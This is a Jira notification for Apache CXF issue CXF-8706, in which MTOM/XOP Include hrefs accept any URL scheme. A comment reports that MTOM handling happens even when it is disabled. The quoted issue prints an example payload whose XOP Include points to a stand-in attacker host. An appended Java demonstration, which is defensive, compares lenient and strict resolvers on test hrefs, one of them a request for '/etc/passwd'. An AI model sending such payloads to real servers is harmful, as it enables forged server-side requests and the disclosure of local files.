Posted to issues@cxf.apache.org by "Stefan Berger (Jira)" <ji...@apache.org> on 2022/12/19 12:36:00 UTC

[jira] [Commented] (CXF-8706) CXF MTOM handler allow content injection

    [ https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17649304#comment-17649304 ] 

Stefan Berger commented on CXF-8706:
------------------------------------

I don't think this is limited to MTOM enabled only.

I can send MTOM requests to my server with an Endpoint where {{SOAPBinding.isMTOMEnabled()}} returns false.

Is it possible that {{.isMTOMEnabled() == false}} is ignored on the server side? Debugging breakpoints aren't triggered. Neither on startup, nor when an MTOM request is received.

> CXF MTOM handler allow content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled, Unmarshaller allows XOP Include tag to have href attributes that allow any protocols.  According to the W3C MTOM spec, only "cid:" should be allowed for href scheme.
> The affected call stack is:
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554    
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49    
>     MTOMDecorator.startElement(TagName) line: 70    
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId, Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4), StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else {// should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
> 
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload" xmlns:inc="http://www.w3.org/2004/08/xop/include"/></stringvalue>



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
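The following is an added illustration written for this page; it is not CXF code and not part of the issue or the comment above. It places a resolver that mirrors the quoted getAttachmentDataSource logic (any href containing "://" falls through to a URL fetch) beside a strict one that accepts only "cid:" references resolved against the request's own MIME parts, and feeds both the hrefs found in a constructed SOAP fragment. The class name XopHrefCheck, the methods resolveLenient, resolveStrict and xopHrefs, the attachment map and the sample body are all assumptions made for the example; it needs Java 11 or newer for URLDecoder.decode(String, Charset).

```java
import java.io.ByteArrayInputStream;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

/**
 * Added example, not CXF source. Contrasts the href handling quoted in CXF-8706
 * with a resolver that only accepts XOP "cid:" references. Names and the
 * attachment store (a constructed Map keyed by Content-ID) are hypothetical.
 */
public class XopHrefCheck {
    static final String XOP_NS = "http://www.w3.org/2004/08/xop/include";

    /** Mirrors the quoted logic. Returns a label of what would happen instead of doing it. */
    static String resolveLenient(String href, Map<String, byte[]> atts) {
        if (href.startsWith("cid:")) {
            String id = URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);
            return atts.containsKey(id) ? "attachment " + id : "missing attachment " + id;
        } else if (href.indexOf("://") == -1) {
            return atts.containsKey(href) ? "attachment " + href : "missing attachment " + href;
        } else {
            // This is the branch the issue is about: the server would open the URL itself,
            // so the sender controls what content (and which scheme) gets loaded.
            return "WOULD FETCH " + href;
        }
    }

    /** Hardened form: an XOP Include must use cid: and must name an existing MIME part. */
    static byte[] resolveStrict(String href, Map<String, byte[]> atts) {
        if (href == null || !href.startsWith("cid:")) {
            throw new IllegalArgumentException("XOP href must use the cid: scheme: " + href);
        }
        String id = URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);
        byte[] data = atts.get(id);
        if (data == null) {
            throw new IllegalArgumentException("no MIME part with Content-ID " + id);
        }
        return data;
    }

    /** Collects the href of every xop:Include element with a namespace-aware, DTD-free parse. */
    static List<String> xopHrefs(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        Document d = f.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        NodeList nl = d.getElementsByTagNameNS(XOP_NS, "Include");
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nl.getLength(); i++) {
            out.add(((Element) nl.item(i)).getAttribute("href"));
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Constructed attachment store standing in for the request's MIME parts.
        Map<String, byte[]> atts = new HashMap<>();
        atts.put("part1@example.org", "hello from part1".getBytes(StandardCharsets.UTF_8));

        // Constructed body: one legitimate cid: reference and two hrefs of the kind the issue describes.
        String body = "<root xmlns:inc=\"" + XOP_NS + "\">"
                + "<stringvalue><inc:Include href=\"cid:part1%40example.org\"/></stringvalue>"
                + "<stringvalue><inc:Include href=\"http://attackers.site/exploit/payload\"/></stringvalue>"
                + "<stringvalue><inc:Include href=\"file:///etc/passwd\"/></stringvalue>"
                + "</root>";

        for (String href : xopHrefs(body)) {
            System.out.println("href    : " + href);
            System.out.println("lenient : " + resolveLenient(href, atts));
            try {
                System.out.println("strict  : " + new String(resolveStrict(href, atts), StandardCharsets.UTF_8));
            } catch (IllegalArgumentException e) {
                System.out.println("strict  : rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Run it with `java XopHrefCheck.java`. The lenient resolver reports that it would fetch both the http: and the file: href, while the strict resolver returns the MIME part for the cid: reference and rejects the other two. The check is keyed only on the href, so it does not depend on whether the endpoint itself has MTOM switched on.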